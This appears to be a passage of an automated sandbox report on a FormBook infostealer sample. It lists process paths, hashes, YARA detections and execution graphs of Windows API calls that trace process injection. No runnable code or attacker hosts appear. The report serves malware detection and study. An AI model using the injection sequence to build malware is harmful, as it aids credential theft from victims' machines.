                                                                  Imagebase:0x7d0000
                                                                  File size:41'472 bytes
                                                                  MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:9
                                                                  Start time:19:21:27
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe"
                                                                  Imagebase:0x700000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:19:21:40
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff79f9e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:219
                                                                    Total number of Limit Nodes:21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

                                                                    control_flow_graph 337 bcd4e8-bcd587 GetCurrentProcess 341 bcd589-bcd58f 337->341 342 bcd590-bcd5c4 GetCurrentThread 337->342 341->342 343 bcd5cd-bcd601 GetCurrentProcess 342->343 344 bcd5c6-bcd5cc 342->344 346 bcd60a-bcd625 call bcd6c8 343->346 347 bcd603-bcd609 343->347 344->343 350 bcd62b-bcd65a GetCurrentThreadId 346->350 347->346 351 bcd65c-bcd662 350->351 352 bcd663-bcd6c5 350->352 351->352
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD576
                                                                    • GetCurrentThread.KERNEL32 ref: 00BCD5B3
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD5F0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BCD649
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0

                                                                    Control-flow Graph

                                                                    control_flow_graph 359 bcd4f8-bcd587 GetCurrentProcess 363 bcd589-bcd58f 359->363 364 bcd590-bcd5c4 GetCurrentThread 359->364 363->364 365 bcd5cd-bcd601 GetCurrentProcess 364->365 366 bcd5c6-bcd5cc 364->366 368 bcd60a-bcd625 call bcd6c8 365->368 369 bcd603-bcd609 365->369 366->365 372 bcd62b-bcd65a GetCurrentThreadId 368->372 369->368 373 bcd65c-bcd662 372->373 374 bcd663-bcd6c5 372->374 373->374
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD576
                                                                    • GetCurrentThread.KERNEL32 ref: 00BCD5B3
                                                                    • GetCurrentProcess.KERNEL32 ref: 00BCD5F0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BCD649
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07275986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07275986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB0BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BC59C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BC59C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07275158
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07275158
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07275238
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BCD7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07274FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: ContextThreadWow64
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07274FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: ContextThreadWow64
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07275238
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: MemoryProcessRead
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BCD7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                     • API ID: DuplicateHandle
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07275076
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: AllocVirtual
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07275076
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: AllocVirtual
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: ResumeThread
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: ResumeThread
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07277AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: MessagePost
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07277AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                     • API ID: MessagePost
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB0BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                     • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a10f87db0c9964d7342ca50913932d4327ab7412f22525b799490865e71a733
                                                                    • Instruction ID: bf4849f203614ea1a0bf809d7dc0db91d88430d8e8bdb7f4ad1c832d4231049d
                                                                    • Opcode Fuzzy Hash: 0a10f87db0c9964d7342ca50913932d4327ab7412f22525b799490865e71a733
                                                                    • Instruction Fuzzy Hash: 7CE1C4B4E10119CBDB14DFA9C6809AEFBF2FF89305F248169D418AB356D731A942CF61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25122599861d31e3c1107f0b924afd87ab96d9cc9ae159684a4484b86c8c5032
                                                                    • Instruction ID: 70929e83080746fd47296b8c60413bd885fc3928dac3064d4a77032b4dff7abe
                                                                    • Opcode Fuzzy Hash: 25122599861d31e3c1107f0b924afd87ab96d9cc9ae159684a4484b86c8c5032
                                                                    • Instruction Fuzzy Hash: BEE10CB4E101598FDB14DFA9C6809AEFBF2FF89305F248159D418A7356D730A942CF61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf2b6aa94f1935976c81992dc1334ca2121052631714e23a9c49106de908a552
                                                                    • Instruction ID: 1c32a50f5f217bae3ecb5081b44d37f3520f0b4e1805b06ff4520a34ba3c4ff5
                                                                    • Opcode Fuzzy Hash: cf2b6aa94f1935976c81992dc1334ca2121052631714e23a9c49106de908a552
                                                                    • Instruction Fuzzy Hash: 4EE1D7B4E101198FDB14DFA9C6809AEFBF2FF89305F248169D414AB356D731A942CF61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1158e9ac363f6db0e408e5ed722e8bd7af667bda03dd56c2bc9268ac9f181d81
                                                                    • Instruction ID: b6483b919440628b68c81d4ae88af11dd2420a629247034621546a2449698f41
                                                                    • Opcode Fuzzy Hash: 1158e9ac363f6db0e408e5ed722e8bd7af667bda03dd56c2bc9268ac9f181d81
                                                                    • Instruction Fuzzy Hash: 45E119B4E101598FDB14DFA8C6809AEFBF2FF89305F248169D414AB356D731A942CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a0fa164bee62512dc06e1c19e353224ccf6efe1cad9fd8141b70cea380e7139
                                                                    • Instruction ID: 9e2b2a11a5c76d0e450fb03e75e92a6f66c63b6528d824996b68e7856de6094d
                                                                    • Opcode Fuzzy Hash: 5a0fa164bee62512dc06e1c19e353224ccf6efe1cad9fd8141b70cea380e7139
                                                                    • Instruction Fuzzy Hash: D3E1D6B4E101198FDB14DFA9C6909AEFBF2FF89305F248169D418AB356D730A942CF61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2244691009.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_69a0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30ec147b72bd2b54c270fbd887c0d424f27427d7f7b1561dd2e1de475b371886
                                                                    • Instruction ID: 5f5f79d8ea55d91843db235d6d01589f9e4f99320994423423b5a1327a56d0f8
                                                                    • Opcode Fuzzy Hash: 30ec147b72bd2b54c270fbd887c0d424f27427d7f7b1561dd2e1de475b371886
                                                                    • Instruction Fuzzy Hash: C7D11B31D2075ADACB01EB68D990A9DB7B1FF95300F10C79AD40977624EF70AAC9CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 256f85f7228cde5f5ea5803facbff8676ef8cdb08c83b0e20e11a875270ba0a5
                                                                    • Instruction ID: 05de3f9765a10a178b04986399db9be39dc58077c0e975cf6797a838e7e5a1a6
                                                                    • Opcode Fuzzy Hash: 256f85f7228cde5f5ea5803facbff8676ef8cdb08c83b0e20e11a875270ba0a5
                                                                    • Instruction Fuzzy Hash: 98A11936A00216DFCF05DFA5C884AAEB7F2FF85300B1585BAE805AB265DB71E955CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2244691009.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_69a0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c507113f68f49d4c946360b97099268ef2e4be775ca46bbd1d74166b3528b13d
                                                                    • Instruction ID: c0f68936ffed4c317c2359fec09a57d7dc067f658ab9a345c65666b8541ea19d
                                                                    • Opcode Fuzzy Hash: c507113f68f49d4c946360b97099268ef2e4be775ca46bbd1d74166b3528b13d
                                                                    • Instruction Fuzzy Hash: 10D11A31D2071ADACB01EB68D990A9DB7B1FF95300F10C79AD50977624EF70AAC9CB91

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                                    Signature Coverage:8.4%
                                                                    Total number of Nodes:155
                                                                    Total number of Limit Nodes:15

                                                                    Control-flow Graph

                                                                    control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                    • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755

                                                                    Control-flow Graph

                                                                    control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                    • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4

                                                                    Control-flow Graph

                                                                    control_flow_graph 262 15c2b60-15c2b6c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1fe3ec362dafc5f7d56a533111b94945b595d1b2564284bd36deb788ec045112
                                                                    • Instruction ID: 5ad913bc7a380b30c7b17b7691332b04d9a7cf7ed03286173fa25b175786ce1f
                                                                    • Opcode Fuzzy Hash: 1fe3ec362dafc5f7d56a533111b94945b595d1b2564284bd36deb788ec045112
                                                                    • Instruction Fuzzy Hash: 1F900265202410034115715C4414616405AA7E0211B59C421E1018990DC56589916326
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4d1cbf7eae69e0c8a2f314b4d8ffc3e4510518b2af80117f932aa940f605d170
                                                                    • Instruction ID: b6b9ca5da50639972e37e34530b1bd3d0f11bf6a69bf4df69b6f463f0c8e3875
                                                                    • Opcode Fuzzy Hash: 4d1cbf7eae69e0c8a2f314b4d8ffc3e4510518b2af80117f932aa940f605d170
                                                                    • Instruction Fuzzy Hash: 6890023520141413D121715C45047070059A7D0251F99C812E0428958DD6968A52A322

                                                                    Control-flow Graph

                                                                    control_flow_graph 263 15c2c70-15c2c7c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7a333232918dbb6137a9fc41bdbfd4cb6994878e773a71901d37ccc6f17fec1
                                                                    • Instruction ID: 448cc6d87bfa3c0a577c6cf6090b8f98127f21cd45aef7f6d9063e4e0287a2f5
                                                                    • Opcode Fuzzy Hash: d7a333232918dbb6137a9fc41bdbfd4cb6994878e773a71901d37ccc6f17fec1
                                                                    • Instruction Fuzzy Hash: 2290023520149802D120715C840474A0055A7D0311F5DC811E4428A58DC6D589917322
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 52c2535fdb8539a8c1d06039c12627bb37a6bd8049454c5299d92654faa4418a
                                                                    • Instruction ID: 86620e19da5f5a81f7b9a681d168af534a5789d66b0d7e0795af803dd13edfeb
                                                                    • Opcode Fuzzy Hash: 52c2535fdb8539a8c1d06039c12627bb37a6bd8049454c5299d92654faa4418a
                                                                    • Instruction Fuzzy Hash: 0E90023560551402D110715C45147061055A7D0211F69C811E0428968DC7D58A5167A3

                                                                    Control-flow Graph

                                                                    control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-152878582
                                                                    • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                    • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 1836367815-59622768

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 34 4143b3-4143c0 31->34 35 414342-414354 PostThreadMessageW 31->35 38 4143c3-4143c6 34->38 36 414363-414364 35->36 37 414356-414360 35->37 36->32 37->36 39 4143e6-4143ea 38->39 40 4143c8-4143cc 38->40 39->38 41 4143ec-4143f0 39->41 40->39 42 4143ce-4143d2 40->42 42->39 43 4143d4-4143d8 42->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                    Strings
                                                                    Memory Dump Source
